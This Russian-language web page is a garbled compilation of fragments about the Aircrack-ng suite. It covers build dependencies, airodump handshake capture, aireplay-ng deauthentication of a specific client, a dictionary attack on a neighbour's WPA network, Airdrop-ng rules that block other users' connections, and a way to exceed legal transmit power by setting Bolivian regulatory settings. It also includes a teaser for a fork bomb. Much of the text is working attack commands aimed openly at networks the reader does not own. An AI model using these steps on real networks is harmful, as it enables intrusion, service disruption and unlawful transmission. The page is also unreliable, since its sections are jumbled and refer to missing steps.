Aircrack-ng aircrack-ng

Содержание:

Optional stuff

  • If you want SSID filtering with regular expression in airodump-ng
    (-essid-regex) pcre development package is required.
  • If you want to use airolib-ng and ‘-r’ option in aircrack-ng,
    SQLite development package >= 3.3.17 (3.6.X version or better is recommended)
  • If you want to use Airpcap, the ‘developer’ directory from the CD/ISO/SDK is required.
  • In order to build , , , and ,
    libpcap development package is required (on Cygwin, use the Aircap SDK instead; see above)
  • For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc9
  • rfkill
  • If you want Airodump-ng to log GPS coordinates, gpsd is needed
  • For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost
  • CMocka for unit testing
  • For intergation testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen

Шаг 2 Airmon-ng

Первый инструмент, который мы рассмотрим и который понадобится практически во всех случаях взлома WiFi, — это airmon-ng , который превращает нашу карту в карту с неразборчивым режимом. Это означает, что наша карта будет слушать вообще все.

Ну, это почти правильно. Когда наша сетевая карта находится в беспорядочном режиме, это означает, что она может видеть и получать весь сетевой трафик. Как правило, сетевые карты будут получать только пакеты, предназначенные для них (как определено MAC-адресом сетевой карты), но с помощью airmon-ng он будет получать весь беспроводной трафик, предназначенный для нас или нет.

Мы можем запустить этот инструмент, набрав airmon-ng , действие (запуск / остановка), а затем интерфейс (mon0):

bt> airmon-ng start wlan1

Airmon-ng отвечает ключевой информацией о нашем беспроводном адаптере, включая чипсет и драйвер

Самое главное, обратите внимание, что оно изменило обозначение нашего беспроводного адаптера с wlan1 на mon0

Комплекты для взлома WI-FI для ленивых

Дистрибутив Backtrack –это, по большому счету, готовый сборник софта для тех, кто не хочет париться с поиском утилит для пентеста. Но если говорить о взломе Wi-Fi, то сборники бывают не только программ, но и оборудования.

  1. В MegaNews прошлого номера мы упоминали о готовых комплектах девайсов для взлома Wi-Fi, которые активно продаются в Китае под лозунгом «Интернет должен быть бесплатен». Собственно, сам комплект состоит из дешевой узконаправленной антенны, Wi-Fi USB-модуля, к которому можно подключить антенну, диска с записанным Backtrack’ом и подробной иллюстрированной инструкции о том, как подобрать ключ с помощью утилит Spoonwep/Spoonwpa. Собрать такой комплект ничего не стоит самому. Главное — приобрести беспроводный модуль; дешевле всего он обойдется, если покупать на известной китайской онлайн-барахолке dealextreme.com. Что касается антенны, то ее вообще можно сделать самому по схемам с сайтов nag.ru и lan23.ru.
  2. Не в пример Китаю, в Штатах продается девайс, который намного более технологичен — это WiFi Pineapple (WiFi Pineapple). В двух словах — это хардварная реализация атаки Rogue AP. Внутри небольшого игрушечного ананаса размещается точка доступа с хитрым софтом, который «заманивает» клиентов и снимает трафик. Автономная работа «ананаса» достигается за счет 4-х пальчиковых батареек. Стоимость такой игрушки составляет $144, но разработчиками только приветствуется, если люди собирают девайс сами. В качестве основы взята дешевая точка доступа Fon 2100 (www.fon.com) с беспроводной картой на чипсете Atheros, держатель для батареек из онлайнмагазина радиотехники (bit.ly/onoffswitch), а в качестве ПО используется специальная версия утилиты KARMA — Jasager (www.digininja.org/jasager). На сайте www.hak5.org/w/index.php/Jasager даже приведена подробная инструкция по сборке и настройке.

Как взломать пароль к Wi-Fi с помощью Aircrack-NG

Разберём на простом примере алгоритм взлома пароля соседской вай-фай сети, которая зашифрована протоколом WPA (ныне наиболее популярен) используя Aircrack-NG. Для этого выполните следующее:

  1. Запустите программу, перейдите в первую вкладку «Aircrack-ng»;
  2. В строке «Filenames» указываем путь к файлу дампа с перехваченными пакетами (данный файл можно получить, использовав, к примеру, программу «CommView for WiFi»);
  3. В «Encryption» (шифрование) выбираем «WPA»;
  4. В строке «Wordlist» указываем путь к файлу, содержащему огромную базу вариантов паролей (его можно поискать в сети);
  5. Ставим галочку в «Advanced option» (Дополнительные опции);
  6. Ставим галочку в «Specify ESSID» и указываем там имя взламываемой нами Wi-Fi сети;
  7. Теперь ставим галочку в «Specify BSSID», и в открывшейся строке указываем MAC-адрес сети (с ним поможет та же «CommView for WiFi», во вкладке «Узлы» которой необходимо кликнуть правой клавишей мыши на нужной нам сети и выбрать в появившемся меню «Копировать MAC-адрес»);
  8. Затем кликаем на кнопку «Launch» (запуск) внизу и ждём нахождения правильного пароля. В зависимости от сложности пароля время поиска может занять от нескольких минут до 5-10 часов (а то и более).

Надеюсь вы поняли как пользоваться Aircrack-ng и вы сумели взломать точку доступа.

Зачем нужна программа Aircrack-ng?

Программный пакет Aircrack-ng предоставляет пользователю следующий набор утилит:

  • Aircrack-ng — основная утилита из программного пакета, предназначенная для моделирования взлома беспроводной сети путем подбора пароля доступа к Wi-Fi-роутеру. Утилита использует метод brute-force, заключающийся в переборе паролей из заранее созданного и формирующегося динамически (перебор символов по заданному условию) парольного словаря. Aircrack-ng работает с методами шифрования WEP, WPA и WPA2-PSK.
  • Airdecap-ng. Данная утилита позволяет расшифровать трафик, передаваемый через беспроводную сеть. Расшифровка возможна только в случае, если программе известен ключ шифрования сети.
  • Aireplay-ng. Пакетный инжектор — утилита, позволяющая править структуру и содержимое передаваемых сетевых пакетов. С помощью aireplay-ng один тип пакета можно передавать под видом другого типа пакета.
  • Packetforge-ng. Данная утилита служит для генерирования шифрованных сетевых пакетов для его последующей инъекции в сетевой пакет при помощи команды aireplay-ng.
  • Airodump-ng. Утилита-анализатор сетевого трафика. В ее задачу входит сохранение передаваемого трафика в файл для последующего изучения содержимого.
  • Airtun-ng. При помощи данной утилиты можно создать виртуальный интерфейс туннелирования. К примеру, команду airtun-ng можно использовать для обхода блокировок и/или сетевых правил, фильтров и т.д.
  • Данная команда предоставляет широкий инструментарий для слияния и конвертирования трафика.
  • Airbase-ng. Утилита предоставляет дополнительные инструменты и техники для моделирования атак на беспроводную сеть.
  • Airdecloak-ng. Команда для удаления WEP-маскировки с PCAP-файлов.
  • Airolib-ng. Утилита, служащая для хранения и управления идентификаторами ESSID и паролями от беспроводных сетей.
  • Airserv-ng. При помощи данной программы можно открыть удаленный сетевой доступ к сетевой карте компьютера, на котором выполняется команда.
  • Easside-ng. Набор инструментов для коммуникации с Wi-Fi-точкой доступа с WEP-шифрованием без знания самого WEP-ключа.
  • Buddy-ng. Данная утилита работает в паре с easside-ng, предоставляя возможность выполнение требуемых функций на удаленном компьютере.
  • Tkiptun-ng. Инструментарий для моделирования атак типа WPA/TKIP.

Это не полный список утилит, входящих в состав из пакета Aircrack-ng.

Властелин беспроводных устройств

Важной составляющей любой атаки, как уже было сказано, является отключение беспроводного клиента от точки доступа, чтобы он заново подконнектился и обменялся пакетами авторизации. Утилиты aireplayng, mdk3, Void11 — все, по сути, предназначены для одного и того же — отправки в беспроводную сеть пакета деаутентификации, чтобы разорвать коннект между клиентом и AP

Они написаны несколько лет назад, и до сих пор активно используются. Концептуально новая разработка была представлена в начале года в Вашингтоне на конференции Shmoocon — это тулза Airdrop-ng. Что она позволяет сделать? Сказать по правде — почувствовать себя маленьким властелином. Дело тут не ограничивается только отключением клиента от точки доступа. Нет. Вместо этого ты можешь полностью управлять подключениями пользователей, разрешая или полностью запрещая им подключения к точке доступа. Политика задается с помощью правил, вроде тех, которые используются в файер воле.

Причем это могут быть очень гибкие правила, позволяющие реализовать все что угодно. Начиная от того, что разом отключить всех пользователей от любых точек доступа (и препятствования их подключению вновь), и заканчивая сложными правилами, когда коннект разрешается только для строго определенной точки доступа, но и то только для конкретных клиентов (скажем, для ноутбуков компании Dell). Это очень круто.

Правила записываются в текстовом виде в специальный файл и считываются программой последовательно от первого до последнего. Каждое правило состоит из трех полей: action/ap/client. С помощью поля action правила разделяются на разрешающие (a — allow) и запрещающие (d — deny). Параметры «ap» и «client» указывают соответственно на точку доступа и клиентов, к которым это правило применяется. Общий синтаксис такой:

или

По умолчанию Airdrop-ng пропускает весь беспроводной трафик, что не сильно весело.

Возьмем для примера простое правило: d/00-11-22-33-44-55|any. Оно будет запрещать любым (any) клиентам подключаться к точке доступа, у которой MAC-адрес — 00:11:22:33:44:55. Вместо целого MAC’а можно было указать только первые три составляющие, которые, как известно, закрепляются за конкретными производителями. Более того, можно даже задать название вендора в строковом виде (d/Linksys|any): программа в этом случае сама заглянет в базу Company OUI, где найдет соответствие «производитель — MAC-адрес» и подставит нужное значение. Те же самые правила относятся и клиенту. К примеру, так можно ограничить возможность Wi-Fi для всей продукции Apple: d/any|Apple. Еще одна особенность: в параметре client может быть указан список из разных MAC-адресов, например, 11:22:33:44:55:66,00: 11:22:33:44:55,55:44:33:22:11:0. Теперь посмотрим, как это выглядит на практике.

Шаг 6 Увеличиваем мощность

Важнейшее звено в хакерской атаке — удостовериться, что наша поддельная AP ближе или сильнее, чем оригинальная AP. Это может быть критическим недостатком, когда физический доступ недоступен. В аэропортах и ​​других общественных местах это не проблема, но в нашем сценарии у нас нет физического доступа, и очень вероятно, что его AP ближе и сигнал сильнее, чем наш. Не позволяйте этому удерживать нас!

Во-первых, мы можем усилить сигнал на нашей точке доступа. Мы можем увеличить наш AP до максимальной мощности, набрав;

iwconfig wlan0 txpower 27

Эта команда увеличит нашу выходную мощность до максимально допустимого законом в США, 27 дБм или 500 милливатт

Обратите внимание, что в России это значение другое! Для различных полос частот мощность можно найти тут. В некоторых случаях даже увеличение мощности до 500 мВт может оказаться недостаточным. Если мы попытаемся увеличить мощность до максимума на наших картах Alfa — 1000 мВт или 30 дБм — мы получим сообщение об ошибке (некоторые из более новых карт могут фактически передавать сигнал в четыре раза сильнее, чем это допустимо по закону)

В некоторых случаях даже увеличение мощности до 500 мВт может оказаться недостаточным. Если мы попытаемся увеличить мощность до максимума на наших картах Alfa — 1000 мВт или 30 дБм — мы получим сообщение об ошибке (некоторые из более новых карт могут фактически передавать сигнал в четыре раза сильнее, чем это допустимо по закону).

iwconfig wlan0 txpower 30

Примечание. Этот шаг запрещен в США и России, поэтому не используйте его, если у вас нет специального разрешения или вы не являетесь сотрудником правоохранительных органов.

У каждой нации есть свой набор правил Wi-Fi. Некоторые из них допускают больше мощности и больше каналов, чем США и Россия. Например, Боливия позволяет использовать канал 12 и полную мощность 1000 мВт. Мы можем заставить нашу карту Альфа использовать боливийские правила, просто набрав:

iw reg set BO

Теперь, когда мы находимся в сфере регулирования Боливии, мы можем максимально увеличить наши возможности, набрав:

iwconfig wlan0 txpower 30

Проверьте выходную мощность, набрав:

iwconfig

И теперь мы можем видеть в конце второй строки, что наша мощность теперь составляет до 30 дБм или 1000 милливатт, этого достаточно, чтобы подавить все остальные локальные точки доступа даже из нескольких домов!

Fragmentation Versus Chopchop

Fragmentation:

Pros

— Can obtain the full packet length of 1500 bytes XOR. This means you can subsequently pretty well create any size of packet.
— May work where chopchop does not
— Is extremely fast. It yields the XOR stream extremely quickly when successful.

Cons

— Setup to execute the attack is more subject to the device drivers. For example, Atheros does not generate the correct packets unless the wireless card is set
to the mac address you are spoofing.
— You need to be physically closer to the access point since if any packets are lost then the attack fails.

Chopchop

Pro

— May work where frag does not work.

Cons

— Cannot be used against every access point.
— The maximum XOR bits is limited to the length of the packet you chopchop against.
— Much slower then the fragmentation attack.

Airodump-ng: Authentication Handshake

Cool Tip: Want to have some “fun”? Create a Linux fork bomb! One small string that is able to hang the whole system! Read more →

Now, when our wireless adapter is in monitor mode, we have a capability to see all the wireless traffic that passes by in the air.

This can be done with the command:

$ sudo airodump-ng mon0

All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:

CH 1 ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

Start the on AP channel with the filter for BSSID to collect the authentication handshake for the access point we are interested in:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
Option Description
The channel for the wireless network
The MAC address of the access point
The file name prefix for the file which will contain authentication handshake
The wireless interface
Fixes the ‘fixed channel : -1’ error message

If you want to speed up this process – go to the step #4 and try to force wireless client reauthentication.

After some time you should see the in the top right-hand corner of the screen.

This means that the has successfully captured the handshake:

CH 1 ][ 2014-05-29 12:46  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

Шаг 5 Aireplay-Ng

Aireplay-ng — еще один мощный инструмент в нашем арсенале aircrack-ng, и его можно использовать для генерации или ускорения трафика на точке доступа. Это может быть особенно полезно при таких атаках, как атака deauth, которая удаляет всех пользователей точки доступа, атаки с использованием паролей WEP и WPA2, а также атаки ARP-инъекций и повторного воспроизведения.

Aireplay-ng может получать пакеты из двух источников:

  • Прямой поток пакетов или
  • Предварительно захваченный файл pcap

Файл pcap — это стандартный тип файла, связанный с такими инструментами захвата пакетов, как libpcap и winpcap. Если вы когда-либо использовали Wireshark, вы, скорее всего, работали с файлами pcap.

На приведенном выше первой половины экрана справки aireplay-ng мы видим, что aireplay может фильтровать по BSSID точки доступа, MAC-адресу источника или получателя, минимальной и максимальной длины пакета и т.д. Если прокручиваем экран справки вниз, видим некоторые варианты атаки, используя aireplay-ng:

Они включают в себя deauth, fake deauth, интерактивный, arpreplay (необходимый для быстрого взлома WEP), chopchop (форма статистического метода для дешифрования WEP-пакетов без взлома пароля), фрагмент, caffe latte (атакующий на стороне клиента) и другие.

Эти четыре инструмента из пакета aircrack-ng являются нашими рабочими лошадками для взлома Wi-Fi. Мы будем использовать каждый из них почти во всех взломах. Некоторые из наших более хак-специфичных инструментов включают airdecap-ng, airtun-ng, airolib-ng и airbase-ng. Давайте кратко рассмотрим каждый из них.

Troubleshooting

SU binary not found!

Hijacker needs root access to run. It expects a binary file, which is a shell executed with root privileges. On startup, the app runs a command. If you are getting this message, then this command has failed. Either you are not rooted, or your root solution did not provide a binary in a PATH accessible directory.

No root access

Hijacker needs root access to run. It runs all its commands through . When is called, some app on your device (which manages the root access, e.g. SuperSU, Superuser) should ask you if you want to grant root access to Hijacker. If access is denied, you get this message. Make sure that Hijacker is authorized to run root commands.

Directory ‘bin/lib’ could not be created

This means that the app failed to create the ‘bin’ or ‘lib’ directories in its own directory within the system. If you see this, something is wrong with your OS, Hijacker can’t do anything about this.

Hijacker watchdog detected a problem

Hijacker runs a background service to make sure that the tools that are supposed to be running, are actually running, and the tools that are supposed to be stopped, are stopped. In the event one of these checks fails, you will get a warning.

Something is not running: This could be caused by a tool stopping unexpectedly, which could be a sign of bad parameters, tool working differently that the app expects, other software on the device killing it, wifi turned off or not in monitor mode, or even a broken tool (if you compiled it manually).

Something is still running: This could be caused by a failed ‘stop’ operation by the app or the tool running on its own (if you have left the app open in the background and you run the tool by yourself). A failed ‘stop’ operation could be caused by denied root access, or starting the app after it crashed and didn’t get a change to run the ‘stop’ operations (although this shouldn’t happen).

Can’t open shell to generate the bug report

The app crashed, a new activity came up, and it says it can’t open a shell to generate the bug report. This means exactly what it says. It can’t open a root shell; it executed and failed. No/denied or improperly configured root access.
Hijacker needs root access to generate the bug report because it needs to get the device’s logfiles, attempt to run the tools to make sure they are installed correctly, read the WiFi firmware, etc.

Can’t create report (external storage write access denied)

Self explanatory.

Miscellaneous

In settings, there is an option to test the tools. If something goes wrong, you can click ‘Copy test command’ and select the tool that fails. This will copy a test command to your clipboard, which you can manually run in a root shell and see what’s wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the ‘Send feedback’ option in the app’s settings.

Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are auditing tools. This means that they are used to test the integrity of your network, so there is a chance (and you should hope for it) that the attacks don’t work on your network. However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected.

Что такое Aircrack-NG

Aircrack-NG — это набор сетевых программ, предназначенных для обнаружения, анализа, перехвата и взлома беспроводных сетей и соответствующего сетевого трафика. С помощью инструментария, представленного в данном пакете, можно взламывать протоколы безопасности WEP и WPA/WPA2-PSK, тестировать беспроводные сети на уязвимость к внешним атакам (penetration test), проводить проверку стойкости сети и так далее.

Программа работает с большинством популярных ОС (Виндовс, Юникс, Линукс, Мак ОС), обладая также версией для мобильных платформ (Android, Symbian, iOS).

  • Консольном (для более опытных пользователей и специалистов);
  • Графическом (GUI) – удобный графический формат;

При этом работа даже с более простым GUI-вариантом предполагает предварительную подготовку пользователя. Необходимо разобраться с понятийным аппаратом, уяснить специфику алгоритмов шифрования WEP, WPA и WPA2, ознакомиться с вспомогательными программами, которые помогут нам во взломе (к примеру, с комплементарным приложением CommView) и так далее. В статье я расскажу об использовании расшифровщика перехваченного трафика Aircrack-NG.

Взлом WIFI c Aircrack-NG

Airodump-ng: Перехват Рукопожатия

Дельный Совет: Хотите немного «развлечься»? Создайте форк-бомбу в Linux! Одна маленькая строчка, способная повесить всю систему! Читать далее →

Теперь, когда беспроводной адаптер переведен в режим мониторинга, у нас появилась возможность видеть весь проходящий мимо нас трафик.

Это можно сделать с помощью команды :

$ sudo airodump-ng mon0

Все видимые точки доступа показаны в верхней части экрана, а подключенные клиенты в нижней:

CH 1 ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

Для того, чтобы поймать рукопожатие, определите интересующую вас точку доступа и запустите на том же канале с фильтром по BSSID:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
Опция Описание
Канал беспроводной сети
MAC адрес точки доступа
Префикс файла в который будет записано рукопожатие
Сетевой интерфейс
Убирает сообщение ‘fixed channel : -1’

Если вы хотите ускорить этот процесс — перейдите к шагу #4 и попытайтесь заставить подключенного беспроводного клиента переподключиться к роутеру.

По прошествию некоторого времени вы должны увидеть сообщение в правом верхнем углу экрана.

Это сообщение означает, что успешно перехватил рукопожатие:

CH 1 ][ 2014-05-29 13:15  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

Как пользоваться AIRDROP-NG

Airdrop-ng написан на Python и требует для работы установленный airodump-ng и библиотеку Lorcon 1. Но если использовать Backtrack, то все необходимое и сама утилита без проблем установится из стандартного репозитория:

Схема использования мало чем отличается от знакомых нам атак:

1) Первым делом надо перевести Wi-Fi-карту в режим мониторинга:

2) Далее запустить беспроводный сниффер airodump, сконфигурировав его вывод в .csv-файл:

3) После этого создаем файл с правилами для AirDrop. Возьмем для примера описанное выше правило, запрещающее соединения с AP, у которой mac = 00-11-22-3344-55, и запишем его в файл rules:

4) Все, осталось запустить сам airdrop-ng, прилинковавшись к csv-выводу сниффера и конфигу с правилами:

Утилита начнет свою работу, выводя сообщения об отправленных в сеть пакетах. Если помимо прочего указать ключ «-b», дополнительно будет выводиться подробный отчет. В результате на консоль будут выводиться сообщения, каким клиентам и где было разрешено или запрещено соединение. Как я уже сказал, условия могут быть намного более гибкими, это достигается с помощью каскада правил:

Таким образом, мы разрешаем доступ к точке клиенту с MAC-адресом 55-44-33-22-11-00, в то время как для всех остальных соединение по-прежнему останется недоступным. Получается, Airdrop-ng можно использовать как простейшую систему контроля доступа :). И это без какоголибо доступа к админке точки!

Использование

Разбиваем на несколько частей, каждую рассматриваем отдельно.

airmon-ng

Самый маленький и основопологающий пакет, его проще всего использовать. Он переводит беспроводную карточку в режим мониторинга и контролирует созданный им виртуальный интерфейс.
С этого момента и далее мы будем использовать работать от имени суперпользователя и моя личная просьба, не копируйте, а набирайте ручками с пониманием.

sudo su #Получаем права root

Теперь нам понадобиться узнать системное имя нашей карточки

iwconfig 

Смотрим вывод, в моём случае это wlan0, сделаю акцент, что не у всех оно будет обязательно wlan0.

airmon-ng <start|stop|check> <interface> 

Разбираемся, airmon-ng имя покета, содержимое <start|stop|check> в пояснении не нуждается, это управление интерфейсом. <interface> системное имя адаптера, канал или частота на которой будет постоянно работать виртуальный адаптер.

airmon-ng start wlan0 1

airmon-ng «запустить» интерфейс wlan0 с каналом 1.
нас интересует вывод, внизу вывода после надписи «wlan0 Atheros ath9k — » будет строка «(monitor mode enabled on mon0)» она нас и интересует, mon0 это имя интерфейса с которым мы будем работать далее.
Для того чтобы остановить виртуальный интерфейсы, нужно или перезагрузить машину или вбить:

airmon-ng stop mon0

Где mon0 это название виртуального интерфейса.

airodump-ng

Нужна для отлавливания пакетов со всех каналов или одного канала, привыкайте к тому, что вай фай карточка работает, не с сетью, а с каналом.
Если мы хотим дальше использовать aircrack-ng то нужно запускать airodump-ng с ключами для вывода файлов.

 mkdir snif
 airodump-ng -w '~/snif/' mon0 
 или 
 airodump-ng -w ~/snif/ mon0

где -w ключ для вывода, а дальше путь куда будут сохраняться файлы прослушивания.
ещё есть ключ –channel после которого пишется номер нужного канала, использовать только при надобности, например если aireplay-ng не хочет корректно работать из-за того что не может переключится на нужный канал.
Практика, запускаем монитор, с ключём на конце, например с названием сети на которую я охочусь (для упорядочивания прослушанных файлов)
Подразумевается что Inri моя сеть и словарь который я использую для перебора содержит взарание известный мне пароль, в реальных условиях подобирать пароль очень долго и успешность зависит от словаря и сложности пароля.

 airodump-ng -w '/home/timofey/snif/Inri' mon0

Разбираем окно:
CH канал который сейчас слушает монитор, Elapsed Время работы.
BSSID MAC адресс роутера, PWR мощьность сигнала, чем выше значение тем лучше, -50 > -80. Beacons количество «объявлений» о существовании, чем выше, тем активнее точка. Data количество пакетов. s — скорость передачи пакетов, MB скорость. ENC — тип ключа, в данном случае WPA. ESSID — имя сети, отображаемое.
Ниже STATION клиенты сетей с BSSID находящимися напротив.

74:DE:2B:77:19:4D - я
18:F4:6A:9B:BF:59 - соседка.
C8:64:C7:53:02:0C - нужная нам точка доступа.

Собственно всё что нас интересует.

aireplay-ng

Пакет для хуков, в данном случае он нам понадобится для получения среди пакетов ключей ауентификации.

Создаём новое окно терминала, получаем права суперпользователя и вбиваем

 aireplay-ng -0 1000 -a C8:64:C7:53:02:0C -c  18:F4:6A:9B:BF:59 mon0

где -0 режим атаки — деаунтефикация.
-а атакуемая точка.
-с клиент который потеряет сеть.
1000 количество попыток (с какой то попытки человек вылетит из сети насовсем и 100% передаст заново ключи ауентификации)
На практике доказано, что хватает 20-30 пакетов чтобы выбить человека из сети, а 1000 садизм.
Видим в мониторе как у клиента растут переданные пакеты, отлично теперь переходим к заключительной части.
Для всяких извращений курим help

 aireplay-ng --help

aircrack-ng

Теперь заключительная часть, у нас куча данных переданных по сети, огромное количество пакетов (чем больше, тем больше шансов выловить что-то полезное).

 aircrack-ng -a 2 -e 'by Inri' -w '/home/timofey/words/my1.txt' '/home/timofey/snif/Inri-02.cap'

Где -a тип ключа 1|WEP 2|WPA/WPA2
-e название сети
-w путь к файлу с словарём *читал что можно написать *** для того чтобы использовать все доступные словари и прослушанные данные, но не выходит, пишет ошибку.
А последнее путь к файлу с прослушанными пакетами.
Вывод, с 4 попытки подобрал (повторяюсь ключ был известен и вписан в словарь для скорости и 100% вероятности перебора).

Aircrack-ng 1.1


                    4 keys tested (415.33 k/s)


                           KEY FOUND! 


      Master Key     : CE 25 4A B0 41 BE 0F 4F E4 01 68 AB 07 69 B2 71 
                       11 20 52 86 63 BA 4E 17 97 B4 8E 84 69 68 34 0D 

      Transient Key  : 58 40 8D E3 D7 8E A8 DA 89 BC 44 39 37 02 D1 C4 
                       16 99 AC C3 93 3E DF 52 AC C4 3E C5 DF C3 CD DF 
                       7B 6F C8 3E E8 B0 F8 AA 16 C1 0C 69 2F 94 47 3A 
                       1B 90 EF 22 59 60 34 B2 96 11 A5 FB 5B F7 21 F2 

      EAPOL HMAC     : DA C6 09 55 6D E8 0E D0 97 25 96 F6 F7 53 D7 7F
Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *